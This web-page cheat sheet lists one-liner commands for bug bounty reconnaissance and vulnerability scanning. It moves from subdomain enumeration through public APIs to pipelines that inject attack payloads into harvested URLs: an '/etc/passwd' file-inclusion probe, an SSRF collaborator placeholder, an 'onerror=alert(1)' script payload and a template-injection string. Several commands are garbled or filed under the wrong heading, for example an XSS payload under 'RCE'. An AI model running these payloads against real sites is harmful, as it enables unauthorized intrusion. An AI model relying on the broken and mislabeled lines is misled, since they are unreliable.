Godzilla
X0NE 9 months ago
Godzilla #cheat-sheet

One liner bug hunting tools

One-Liners tools for bug bounty

# Subdomain enumeration tools

subfinder -d target.com -silent           # Enumerate subdomains using Subfinder
dnsprobe -silent                  # Resolve DNS records for discovered subdomains
cut -d ' ' -f1                   # Extract subdomains from dnsprobe output
grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'  # Filter subdomains containing specific keywords

# Passive subdomain enumeration sources

curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u   # Using DNS bufferover.run API
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u  # Using Riddler search API
nmap --script hostmap-crtsh.nse target.com    # Query Certificate Transparency Logs using nmap script
curl -s "https://certspotter.com/api/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u  # Query Cert Spotter API
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u  # Using Wayback Machine API
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u  # Using Anubis subdomain API
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u  # Query CRT.SH Certificate Transparency Logs
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u  # Using ThreatMiner API
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"  # Using Anubis subdomain API
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"  # Using ThreatCrowd API
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"  # Using HackerTarget API

# CNAME enumeration

ffuf -u https://FUZZ.target.com -w dns.txt -v | grep "| URL |" | awk '{print $4}'  # Use FFuF for CNAME enumeration


# HTTP-related vulnerability scanning

cat subs.txt | xargs -P 50 -I % bash -c "dig % | grep CNAME" | awk '{print $1}' | sed 's/.$//g' | httpx -silent -status-code -cdn -csp-probe -tls-probe  # Perform additional HTTP checks on the subdomains


# LFI (Local File Inclusion) vulnerability scanning

cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"  # Scanning for LFI vulnerabilities using GF and HTTPX
waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'  # Scanning for LFI vulnerabilities using Wayback URLs


# SSRF (Server-Side Request Forgery) vulnerability scanning

cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'  # Scanning for SSRF vulnerabilities using GF and HTTPX


# XSS (Cross-Site Scripting) vulnerability scanning

cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ  # Scanning for XSS vulnerabilities using FFuF and Wayback URLs


# Remote Code Execution (RCE) vulnerability scanning

cat domains.txt | waybackurls | grep -Ev "\.(jpeg|jpg|png|ico)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"  # Scanning for RCE vulnerabilities using URO


# Content Security Policy (CSP) bypass scanning

gau target.com grep '='| qsreplace hack\" -a | while read url;do target-$(curl -s -l $url | egrep -o '(hack" | hack\\")'); echo -e "Target : \e[1;33m $url\e[om" "$target" "\n -"; done I sed 's/hack"/[xss Possible] Reflection Found/g'  # Scanning for CSP bypass vulnerabilities


# Template Injection vulnerability scanning

cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert("  # Scanning for Template Injection vulnerabilities using HTTPX



0
724

Login to Post comments

Comments 0
Curl Command Cheat Sheet for Penetration Testing

Curl Command Cheat Sheet for Penetration Testing

defaultuser.png
lazyhacker
 9 months ago
Protect Yourself against Website Server Attacks

Protect Yourself against Website Server Attacks

defaultuser.png
Admin
 3 months ago

Black Box Testing

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 2 weeks ago
Nmap (Network Mapper )

Nmap (Network Mapper )

defaultuser.png
Admin
 2 months ago
API Basics: Understanding SOAP vs. REST, URLs

API Basics: Understanding SOAP vs. REST, URLs

defaultuser.png
X0NE
 9 months ago